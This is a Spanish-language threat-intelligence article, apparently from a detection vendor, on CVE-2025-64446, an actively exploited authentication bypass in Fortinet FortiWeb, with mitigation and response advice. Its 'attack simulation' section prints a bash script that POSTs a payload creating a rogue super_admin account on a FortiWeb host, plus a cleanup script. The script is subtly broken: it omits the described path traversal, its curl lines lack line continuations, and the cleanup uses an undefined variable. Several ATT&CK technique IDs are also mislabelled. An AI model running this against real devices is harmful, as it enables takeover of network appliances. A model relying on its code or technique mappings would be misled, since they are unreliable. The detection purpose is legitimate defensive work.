SOC Prime Bias: Crítico

19 Nov 2025 12:12
newspaper icon horizon3.ai

Omisión de Autenticación de Fortinet FortiWeb mediante Vulnerabilidad de Recorrido de Ruta (CVE-2025-64446)

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Omisión de Autenticación de Fortinet FortiWeb mediante Vulnerabilidad de Recorrido de Ruta (CVE-2025-64446)
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumen

Una nueva vulnerabilidad crítica de omisión de autenticación divulgada en Fortinet FortiWeb, identificada como CVE-2025-64446, permite a los atacantes no autenticados crear cuentas administrativas mediante una solicitud de recorrido de ruta personalizada. Según los informes disponibles públicamente, la vulnerabilidad ha sido explotada activamente desde principios de octubre de 2025 y posteriormente se añadió a los catálogos oficiales de amenazas debido a su gravedad. La explotación exitosa proporciona control total sobre el appliance WAF afectado y puede permitir a los actores de amenazas profundizar aún más en las redes internas. La investigación temprana sobre CVE-2025-64446 indica que los intentos de explotación continúan apuntando a dispositivos FortiWeb expuestos a internet a gran escala.

Análisis de CVE-2025-64446

CVE-2025-64446 afecta a múltiples versiones de FortiWeb, permitiendo a los atacantes enviar una solicitud POST HTTP maliciosa creada al endpoint de la API. La secuencia de recorrido de directorios permite el acceso al script CGI administrativo responsable de la creación de usuarios. Esto resulta en una nueva cuenta de administrador en el dispositivo, otorgando control completo al adversario. Dado que los dispositivos FortiWeb operan junto a otros productos de Fortinet, esta vulnerabilidad introduce una exposición mayor al ecosistema, lo que significa que una violación exitosa podría permitir a los atacantes moverse lateralmente y comprometer sistemas y servicios adicionales conectados. Los ataques observados previamente en FortiWeb (incluida la actividad alrededor de CVE-2025-25257) refuerzan la probabilidad de un objetivo continuo.

Mitigación

Fortinet ha lanzado parches para todas las versiones afectadas. La mitigación inmediata de CVE-2025-64446 requiere actualizar a la última versión fija del producto, 8.0.2. Las mitigaciones recomendadas incluyen restringir el acceso a la interfaz de administración a direcciones IP de confianza o una VPN, imponer MFA para el acceso administrativo, rotar credenciales para todas las cuentas de administrador de FortiWeb, monitorear la actividad de la API administrativa para eventos anómalos de creación de usuarios y eliminar la exposición de administración HTTP/HTTPS de internet pública. Las organizaciones también deben seguir procedimientos internos de prueba de parches para evitar interrupciones operativas.

Respuesta

Los equipos de seguridad deben confirmar el inventario de versiones, aplicar parches sin demora y deshabilitar el acceso a la administración externa si la actualización inmediata no es posible. Dado que los intentos de explotación están activos, se recomienda mejorar la monitorización de solicitudes POST sospechosas dirigidas al camino de la API vulnerable. Si las cuentas existentes muestran cambios inesperados, roten las credenciales y revisen los registros de auditoría con mayor frecuencia. Recopilar IOCs de CVE-2025-64446, revisar patrones de tráfico y correlacionarlos con actividades recientes de explotación mejorará la visibilidad y reducirá el riesgo.

Flujo de Ataque

Todavía estamos actualizando esta parte. Regístrese para ser notificado

Avísame

Ejecución de Simulación

Prerequisito: La verificación previa de Telemetría y Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntan a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa del Ataque y Comandos:

    1. Reconocimiento (T1016.001): El atacante descubre la IP pública del dispositivo FortiWeb mediante inteligencia de fuentes abiertas.
    2. Captura de Credenciales / Escalada de Privilegios (T1567.004): Utilizando el CVE‑2025‑64446 descubierto, el atacante crea una carga POST maliciosa que crea un nuevo usuario administrador con privilegios completos.
    3. Ejecución: El atacante envía la solicitud creada a través de HTTPS, asegurando que el request_method sea POST y que el request_uri coincida exactamente con /api/v2.0/cmdb/system/admin.

  • Script de Prueba de Regresión:

    #!/usr/bin/env bash
# Explotar CVE-2025-64446 para crear una nueva cuenta de administrador de FortiWeb
# Ajustar variables según sea necesario para el entorno objetivo

TARGET="https://fortiweb.example.com"
ENDPOINT="/api/v2.0/cmdb/system/admin"
NEW_USER="eviladmin"
NEW_PASS="P@ssw0rd!2025"
# La API vulnerable no requiere autenticación para este endpoint (según CVE)
PAYLOAD=$(cat <<EOF
{
    "name": "${NEW_USER}",
    "password": "${NEW_PASS}",
    "privilege": "super_admin"
}
EOF
)

echo "[*] Enviando POST malicioso a ${TARGET}${ENDPOINT}"
curl -k -X POST "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/json" 
     -d "${PAYLOAD}" 
     -o /dev/null -s -w "HTTP %{http_code}n"

echo "[*] Simulación de ataque completa."

  • Comandos de Limpieza:

    #!/usr/bin/env bash
# Eliminar la cuenta de administrador maliciosa creada durante la prueba
TARGET="https://fortiweb.example.com"
ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"

echo "[*] Eliminando la cuenta de administrador de prueba ${NEW_USER}"
curl -k -X DELETE "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/json" 
     -o /dev/null -s -w "HTTP %{http_code}n"

echo "[*] Limpieza completa."

Únase a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para su negocio. Para ayudarle a comenzar y obtener un valor inmediato, reserve una reunión ahora con los expertos de SOC Prime.

Únase Gratis